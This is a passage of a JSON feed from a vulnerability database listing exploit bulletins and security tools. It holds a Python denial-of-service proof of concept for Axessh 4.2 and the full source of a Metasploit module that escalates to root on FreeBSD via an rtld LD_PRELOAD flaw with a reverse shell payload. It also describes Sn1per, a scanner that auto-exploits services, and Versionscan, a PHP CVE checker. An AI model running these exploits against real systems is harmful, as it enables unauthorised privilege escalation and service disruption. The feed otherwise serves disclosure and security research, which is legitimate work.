Error</faul:message><faul:stackTrace>PipelinePairNodePipelinePairNode_requestDynamic Validationrequest-pipelinetrue</faul:stackTrace></faul:Exception></faul:ExceptionSchema></detail></soapenv:Fault></soapenv:Body></soapenv:Envelope>\n\n# 0day.today [2019-05-22] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32757"}, {"lastseen": "2019-05-21T01:53:51", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2019-05-16T00:00:00", "published": "2019-05-16T00:00:00", "id": "1337DAY-ID-32725", "href": "https://0day.today/exploit/description/32725", "title": "Axessh 4.2 - (Log file name) Denial of Service Exploit", "type": "zdt", "sourceData": "#Exploit Title: Axessh 4.2 'Log file name' - Denial of Service (PoC)\r\n#Discovery by: Victor Mondrag\u00f3n\r\n#Vendor Homepage: http://www.labf.com\r\n#Software Link: http://www.labf.com/download/axessh.exe\r\n#Tested Version: 4.2\r\n#Tested on: Windows 7 Service Pack 1 x32\r\n\r\n#Steps to produce the crash:\r\n#1.- Run python code: Axessh_4.2.py\r\n#2.- Open Axess.txt and copy content to clipboard\r\n#3.- Open Axessh.exe\r\n#4.- In \"Telnet Connect Host\" select \"Details>>\" > \"Settings\"\r\n#5.- Select \"Logging\" and enable \"Log all sessions output\"\r\n#6.- In \"Log file name\" paste Clipboard\r\n#7.- Select \"OK\" and in \"Telnet Connect Host\" select \"Ok\"\r\n#8.- Crashed\r\n\r\ncod = \"\\x41\" * 500\r\n\r\nf = open('Axess.txt', 'w')\r\nf.write(cod)\r\nf.close()\n\n# 0day.today [2019-05-21] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32725"}], "packetstorm": [{"lastseen": "2019-05-24T12:45:04", "bulletinFamily": "exploit", "description": "", "modified": "2019-05-22T00:00:00", "published": "2019-05-22T00:00:00", "id": "PACKETSTORM:152997", "href": "https://packetstormsecurity.com/files/152997/FreeBSD-rtld-execl-Privilege-Escalation.html", "title": "FreeBSD rtld execl() Privilege Escalation", "type": "packetstorm", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'FreeBSD rtld execl() Privilege Escalation', \n'Description' => %q{ \nThis module exploits a vulnerability in the FreeBSD \nrun-time link-editor (rtld). \n \nThe rtld `unsetenv()` function fails to remove `LD_*` \nenvironment variables if `__findenv()` fails. \n \nThis can be abused to load arbitrary shared objects using \n`LD_PRELOAD`, resulting in privileged code execution. \n \nThis module has been tested successfully on: \n \nFreeBSD 7.2-RELEASE (amd64); and \nFreeBSD 8.0-RELEASE (amd64). \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Kingcope', # Independent discovery, public disclosure, and exploit \n'stealth', # Discovery and exploit (4b1717926ed0d4823622011625fb1824) \n'bcoles' # Metasploit (using Kingcope's exploit code [modified]) \n], \n'DisclosureDate' => '2009-11-30', \n'Platform' => ['bsd'], # FreeBSD \n'Arch' => \n[ \nARCH_X86, \nARCH_X64, \nARCH_ARMLE, \nARCH_AARCH64, \nARCH_PPC, \nARCH_MIPSLE, \nARCH_MIPSBE \n], \n'SessionTypes' => ['shell'], \n'References' => \n[ \n['BID', '37154'], \n['CVE', '2009-4146'], \n['CVE', '2009-4147'], \n['SOUNDTRACK', 'https://www.youtube.com/watch?v=dDnhthI27Fg'], \n['URL', 'https://seclists.org/fulldisclosure/2009/Nov/371'], \n['URL', 'https://c-skills.blogspot.com/2009/11/always-check-return-value.html'], \n['URL', 'https://lists.freebsd.org/pipermail/freebsd-announce/2009-December/001286.html'], \n['URL', 'https://xorl.wordpress.com/2009/12/01/freebsd-ld_preload-security-bypass/'], \n['URL', 'https://securitytracker.com/id/1023250'] \n], \n'Targets' => [['Automatic', {}]], \n'DefaultOptions' => \n{ \n'PAYLOAD' => 'bsd/x86/shell_reverse_tcp', \n'PrependSetresuid' => true, \n'PrependSetresgid' => true, \n'PrependFork' => true, \n'WfsDelay' => 10 \n}, \n'DefaultTarget' => 0)) \nregister_options [ \nOptString.new('SUID_EXECUTABLE', [ true, 'Path to a SUID executable', '/sbin/ping' ]) \n] \nregister_advanced_options [ \nOptBool.new('ForceExploit', [false, 'Override check result', false]), \nOptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) \n] \nend \n \ndef base_dir \ndatastore['WritableDir'].to_s \nend \n \ndef suid_exe_path \ndatastore['SUID_EXECUTABLE'] \nend \n \ndef upload(path, data) \nprint_status \"Writing '#{path}' (#{data.size} bytes) ...\" \nrm_f path \nwrite_file path, data \nregister_file_for_cleanup path \nend \n \ndef is_root? \n(cmd_exec('id -u').to_s.gsub(/[^\\d]/, '') == '0') \nend \n \ndef check \nkernel_release = cmd_exec('uname -r').to_s \nunless kernel_release =~ /^(7\\.[012]|8\\.0)/ \nvprint_error \"FreeBSD version #{kernel_release} is not vulnerable\" \nreturn CheckCode::Safe \nend \nvprint_good \"FreeBSD version #{kernel_release} appears vulnerable\" \n \nunless command_exists? 'gcc' \nvprint_error 'gcc is not installed' \nreturn CheckCode::Safe \nend \nprint_good 'gcc is installed' \n \nunless setuid? suid_exe_path \nvprint_error \"#{suid_exe_path} is not setuid\" \nreturn CheckCode::Detected \nend \nvprint_good \"#{suid_exe_path} is setuid\" \n \nCheckCode::Appears \nend \n \ndef exploit \nunless check == CheckCode::Appears \nunless datastore['ForceExploit'] \nfail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' \nend \nprint_warning 'Target does not appear to be vulnerable' \nend \n \nif is_root? \nunless datastore['ForceExploit'] \nfail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' \nend \nend \n \nunless writable? base_dir \nfail_with Failure::BadConfig, \"#{base_dir} is not writable\" \nend \n \nif base_dir.length > 1_000 \nfail_with Failure::BadConfig, \"#{base_dir} path length #{base_dir.length} is larger than 1,000\" \nend \n \npayload_path = \"#{base_dir}/.#{rand_text_alphanumeric 5..10}\" \n \nexecutable_data = <<-EOF \n#include <stdio.h> \n#include <stdlib.h> \n#include <unistd.h> \n \nvoid _init() { \nextern char **environ; \nenviron=NULL; \nsystem(\"#{payload_path} &\"); \n} \nEOF \n \nexecutable_path = \"#{base_dir}/.#{rand_text_alphanumeric 5..10}\" \nupload \"#{executable_path}.c\", executable_data \noutput = cmd_exec \"gcc -o #{executable_path}.o -c #{executable_path}.c -fPIC -Wall\" \nregister_file_for_cleanup \"#{executable_path}.o\" \n \nunless output.blank? \nprint_error output \nfail_with Failure::Unknown, \"#{executable_path}.c failed to compile\" \nend \n \nlib_name = \".#{rand_text_alphanumeric 5..10}\" \nlib_path = \"#{base_dir}/#{lib_name}\" \noutput = cmd_exec \"gcc -shared -Wall,-soname,#{lib_name}.0 #{executable_path}.o -o #{lib_path}.0 -nostartfiles\" \nregister_file_for_cleanup \"#{lib_path}.0\" \n \nunless output.blank? \nprint_error output \nfail_with Failure::Unknown, \"#{executable_path}.o failed to compile\" \nend \n \nexploit_data = <<-EOF \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <unistd.h> \n \nint main() { \nextern char **environ; \nenviron = (char**)calloc(8096, sizeof(char)); \n \nenviron[0] = (char*)calloc(1024, sizeof(char)); \nenviron[1] = (char*)calloc(1024, sizeof(char)); \nstrcpy(environ[1], \"LD_PRELOAD=#{lib_path}.0\"); \n \nreturn execl(\"#{suid_exe_path}\", \"\", (char *)0); \n} \nEOF \n \nexploit_path = \"#{base_dir}/.#{rand_text_alphanumeric 5..10}\" \nupload \"#{exploit_path}.c\", exploit_data \noutput = cmd_exec \"gcc #{exploit_path}.c -o #{exploit_path} -Wall\" \nregister_file_for_cleanup exploit_path \n \nunless output.blank? \nprint_error output \nfail_with Failure::Unknown, \"#{exploit_path}.c failed to compile\" \nend \n \nupload payload_path, generate_payload_exe \nchmod payload_path \n \nprint_status 'Launching exploit...' \noutput = cmd_exec exploit_path \noutput.each_line { |line| vprint_status line.chomp } \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/152997/rtld_execl_priv_esc.rb.txt"}], "kitploit": [{"lastseen": "2019-05-22T01:22:03", "bulletinFamily": "tools", "description": "[  ](<https://3.bp.blogspot.com/-bhtqXim-vlU/XNZVo27BruI/AAAAAAAAO4w/wqhBjqL6XlksqzL4vzGsPPETuwmPfvkRwCLcBGAs/s1600/php.png>)\n\n \n\n\nVersionscan is a tool for evaluating your currently installed PHP version and checking it against known CVEs and the versions they were fixed in to report back potential issues. \n\n** PLEASE NOTE: ** Work is still in progress to [ adapt ](<https://www.kitploit.com/search/label/ADAPT> \"adapt\" ) the tool to [ linux ](<https://www.kitploit.com/search/label/Linux> \"linux\" ) distributions that backport security fixes. As of right now, this only reports back for the straight up version reported. \n\n \n** Installation ** \n \n** Using Composer ** \n\n \n \n {\n \"require\": {\n \"psecio/versionscan\": \"dev-master\"\n }\n }\n\nThe only current dependency is the Symfony console. \n \n** Usage ** \nTo run the [ scan ](<https://www.kitploit.com/search/label/Scan> \"scan\" ) against your current PHP version, use: \n` bin/versionscan ` \nThe script will check the ` PHP_VERSION ` for the current instance and generate the pass/fail results. The output looks similar to: \n\n \n \n Executing against version: 5.4.24\n +--------+---------------+------+------------------------------------------------------------------------------------------------------+\n | Status | CVE ID | Risk | Summary |\n +--------+---------------+------+------------------------------------------------------------------------------------------------------+\n | FAIL | CVE-2014-3597 | 6.8 | Multiple buffer overflows in the php_parserr function in ext/standard/dns.c in PHP before 5.4.32 ... |\n | FAIL | CVE-2014-3587 | 4.3 | Integer overflow in the cdf_read_property_info function in cdf.c in file through 5.19, as used in... |\n\nResults will be reported back colorized as well to easily show the pass/fail of the check. \n \n** Parameters ** \nThere are several parameters that can be given to the tool to configure its [ scans ](<https://www.kitploit.com/search/label/Scans> \"scans\" ) and results: \n \n** PHP Version ** \nIf you'd like to define a PHP version to check other than the one the script finds itself, you can use the ` php-version ` parameter: \n\n \n \n bin/versionscan scan --php-version=4.3.2\n\n \n** Report Only Failures ** \nYou can also tell the versionscan to only report back the failures and not the passing tests: \n\n \n \n bin/versionscan scan --fail-only\n\n \n** Sorting results ** \nYou can also sort the results either by the CVE ID or by severity (risk rating), with the ` sort ` parameter and either the \"cve\" or \"risk\" value: \n\n \n \n bin/versionscan scan --sort=risk\n\n \n** Output formats ** \nBy default _ versionscan _ will output information directly to the console in a human-readable result. You can also specify other output formats that may be easier to parse programatically (like JSON). Use the ` --format ` option to change the output: \n\n \n \n vendor/bin/versionscan scan --php-version=5.5 --format=json\n\nSupported output formats are ` console ` , ` json ` , ` xml ` and ` html ` . \nThe HTML output format requires an ` --output ` option of the directory to write the file: \n\n \n \n vendor/bin/versionscan scan --php-version=5.5 --format=html --output=/var/www/output\n\nThe result will be written to a file named something like ` versionscan-output-20150808.html ` \n \n \n\n\n** [ Download Versionscan ](<https://github.com/psecio/versionscan> \"Download Versionscan\" ) **\n", "modified": "2019-05-21T21:17:08", "published": "2019-05-21T21:17:08", "id": "KITPLOIT:3928947731225997712", "href": "http://www.kitploit.com/2019/05/versionscan-php-version-scanner-for.html", "title": "Versionscan - A PHP Version Scanner For Reporting Possible Vulnerabilities", "type": "kitploit", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-12T18:14:06", "bulletinFamily": "tools", "description": "[  ](<https://1.bp.blogspot.com/-Poffj1hNPBk/XNXfkZuyGfI/AAAAAAAAO0U/k4nQgdLXOoEZMOGlGb3wgnx8HgQzEtacgCLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [ automated scanner ](<https://www.kitploit.com/search/label/Automated%20scanner> \"automated scanner\" ) that can be used during a [ penetration test ](<https://www.kitploit.com/search/label/Penetration%20Test> \"penetration test\" ) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information regarding Sn1per Professional, go to [ https://xerosecurity.com ](<https://xerosecurity.com/> \"https://xerosecurity.com\" ) . \n\n \n** SN1PER PROFESSIONAL FEATURES: ** \n \n** Professional reporting interface ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-HnwS8O0KEik/XNXfrGJWPeI/AAAAAAAAO0Y/94Hl4CC3M_kytYKkKldzXNviz4ff92TVACLcBGAs/s1600/Sn1per_8.png>)\n\n \n** Slideshow for all gathered screenshots ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-coOpsZX0XMM/XNXfuVNicUI/AAAAAAAAO0c/Wd2EQSAcI4Uti3bkaa1kxqajpStfjTK0ACLcBGAs/s1600/Sn1per_9.png>)\n\n \n** Searchable and sortable DNS, IP and open port database ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-bfzb6vLbCks/XNXfy5vfkTI/AAAAAAAAO0g/9aO7_9YKrqMyWK3PehtfItlm4DZ6KWR4gCLcBGAs/s1600/Sn1per_10.png>)\n\n \n** Detailed host reports ** \n \n\n\n[  ](<https://4.bp.blogspot.com/-JbxR5Z-2O_4/XNXf2YbT_DI/AAAAAAAAO0o/w8Hin6Cbf1Ue4QbVW70T2-r1Rj82wDsSQCLcBGAs/s1600/Sn1per_11.png>)\n\n \n** NMap HTML host reports ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-TYr4tFOy7Y4/XNXf7dXeSII/AAAAAAAAO0w/0YMKst5KHGoygojHG2r6tJxqkg2a-w1YQCLcBGAs/s1600/Sn1per_12.png>)\n\n \n** Quick links to online recon tools and Google hacking queries ** \n \n\n\n[  ](<https://1.bp.blogspot.com/-FNe1YF5mg68/XNXgAPQOAEI/AAAAAAAAO00/5uuuQo2KqRgwpTE11Z-U6p_XGetjCf9vgCLcBGAs/s1600/Sn1per_13.png>)\n\n \n** Takeovers and Email Security ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-FNah2OwM_nU/XNXgEeJZG9I/AAAAAAAAO08/A7lu1554nJ0GpEOj7AtdZ_emSoyq5lBxQCLcBGAs/s1600/Sn1per_14.png>)\n\n \n** HTML5 Notepad ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-DHOnECOz-T0/XNXgH_QX4JI/AAAAAAAAO1E/s0bFVC-Uf_87tBFY2AJwiJyHgKJ8VgKXQCLcBGAs/s1600/Sn1per_15.png>)\n\n \n** ORDER SN1PER PROFESSIONAL: ** \nTo obtain a Sn1per Professional license, go to [ https://xerosecurity.com ](<https://xerosecurity.com/> \"https://xerosecurity.com\" ) . \n \n** DEMO VIDEO: ** \n \n \n\n\n[  ](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>)\n\n \n \n** SN1PER COMMUNITY FEATURES: ** \n\n\n * Automatically collects basic recon (ie. whois, ping, DNS, etc.) \n * Automatically launches Google hacking queries against a target domain \n * Automatically enumerates open ports via NMap port scanning \n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers \n * Automatically checks for sub-domain hijacking \n * Automatically runs targeted NMap scripts against open ports \n * Automatically runs targeted Metasploit scan and exploit modules \n * Automatically scans all web applications for common vulnerabilities \n * Automatically brute forces ALL open services \n * Automatically test for anonymous FTP access \n * Automatically runs WPScan, Arachni and Nikto for all web services \n * Automatically enumerates NFS shares \n * Automatically test for anonymous LDAP access \n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities \n * Automatically enumerate SNMP community strings, services and users \n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067 \n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers \n * Automatically tests for open X11 servers \n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds \n * Performs high level enumeration of multiple hosts and subnets \n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting \n * Automatically gathers screenshots of all web sites \n * Create individual workspaces to store all scan output \n \n** EXPLOITS: ** \n\n\n * Drupal RESTful Web Services unserialize() SA-CORE-2019-003 \n * Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache Struts \n * Drupal: CVE-2018-7600: [ Remote Code Execution ](<https://www.kitploit.com/search/label/Remote%20Code%20Execution> \"Remote Code Execution\" ) \\- SA-CORE-2018-002 \n * GPON Routers - Authentication Bypass / [ Command Injection ](<https://www.kitploit.com/search/label/Command%20Injection> \"Command Injection\" ) CVE-2018-10561 \n * MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption \n * Apache Tomcat: Remote Code Execution (CVE-2017-12617) \n * Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution CVE-2017-10271 \n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638) \n * Apache Struts 2 Framework Checks - REST plugin with XStream handler (CVE-2017-9805) \n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638) \n * Microsoft IIS WebDav ScStoragePathFromUrl Overflow CVE-2017-7269 \n * ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability CVE-2015-8249 \n * Shellshock Bash Shell remote code execution CVE-2014-6271 \n * HeartBleed OpenSSL Detection CVE-2014-0160 \n * MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387) \n * Tomcat Application Manager Default Ovwebusr Password Vulnerability CVE-2009-3843 \n * MS08-067 Microsoft Server Service Relative Path Stack Corruption \n * Webmin File Disclosure CVE-2006-3392 \n * VsFTPd 2.3.4 Backdoor \n * ProFTPd 1.3.3C Backdoor \n * MS03-026 Microsoft RPC DCOM Interface Overflow \n * DistCC Daemon Command Execution \n * JBoss Java De-Serialization \n * HTTP Writable Path PUT/DELETE File Access \n * Apache Tomcat User Enumeration \n * Tomcat Application Manager Login Bruteforce \n * Jenkins-CI Enumeration \n * HTTP WebDAV Scanner \n * Android Insecure ADB \n * Anonymous FTP Access \n * PHPMyAdmin Backdoor \n * PHPMyAdmin Auth Bypass \n * OpenSSH User Enumeration \n * LibSSH Auth Bypass \n * SMTP User Enumeration \n * Public NFS Mounts \n \n** KALI LINUX INSTALL: ** \n\n \n \n bash install.sh\n\n \n** UBUNTU/DEBIAN/PARROT INSTALL: ** \n\n \n \n bash install_debian_ubuntu.sh\n\n \n** DOCKER INSTALL: ** \n\n \n \n docker build Dockerfile\n\n \n** USAGE: ** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON + FULL PORT SCAN + BRUTE FORCE\n sniper -t|--target <TARGET> -o|--osint -re|--recon -fp|--fullportonly -b|--bruteforce\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] FLYOVER MODE\n sniper -t|--target <TARGET> -m|--mode flyover -w|--workspace <WORKSPACE_ALIAS>\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TA RGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT HTTP MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT HTTPS MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] WEBSCAN MODE\n sniper -t|--target <TARGET> -m|--mode webscan\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] LOOT REIMPORTALL FUNCTION\n sniper -w <WORKSPACE_ALIAS& gt; --reimportall\n \n [*] DELETE WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -d\n \n [*] DELETE HOST FROM WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -t <TARGET> -dh\n \n [*] SCHEDULED SCANS'\n sniper -w <WORKSPACE_ALIAS> -s daily|weekly|monthly'\n \n [*] SCAN STATUS\n sniper --status\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n** MODES: ** \n\n\n * ** NORMAL: ** Performs basic scan of targets and open ports using both active and passive checks for optimal performance. \n * ** STEALTH: ** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking. \n * ** FLYOVER: ** Fast multi-threaded high level scans of multiple targets (useful for collecting high level data on many hosts quickly). \n * ** AIRSTRIKE: ** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning. \n * ** NUKE: ** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. \n * ** DISCOVER: ** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans. \n * ** PORT: ** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode. \n * ** FULLPORTONLY: ** Performs a full detailed port scan and saves results to XML. \n * ** WEB: ** Adds full automatic web application scans to the results (port 80/tcp &amp; 443/tcp only). Ideal for web applications but may increase scan time significantly. \n * ** WEBPORTHTTP: ** Launches a full HTTP web application scan against a specific host and port. \n * ** WEBPORTHTTPS: ** Launches a full HTTPS web application scan against a specific host and port. \n * ** WEBSCAN: ** Launches a full HTTP &amp; HTTPS web application scan against via Burpsuite and Arachni. \n \n** SAMPLE REPORT: ** \n[ https://gist.github.com/1N3/8214ec2da2c91691bcbc ](<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \"https://gist.github.com/1N3/8214ec2da2c91691bcbc\" ) \n \n \n\n\n** [ Download Sn1per ](<https://github.com/1N3/Sn1per> \"Download Sn1per\" ) **\n", "modified": "2019-05-12T13:09:05", "published": "2019-05-12T13:09:05", "id": "KITPLOIT:7013881512724945934", "href": "http://www.kitploit.com/2019/05/sn1per-v70-automated-pentest-framework.html", "title": "Sn1per v7.0 - Automated Pentest Framework For Offensive Security Experts", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}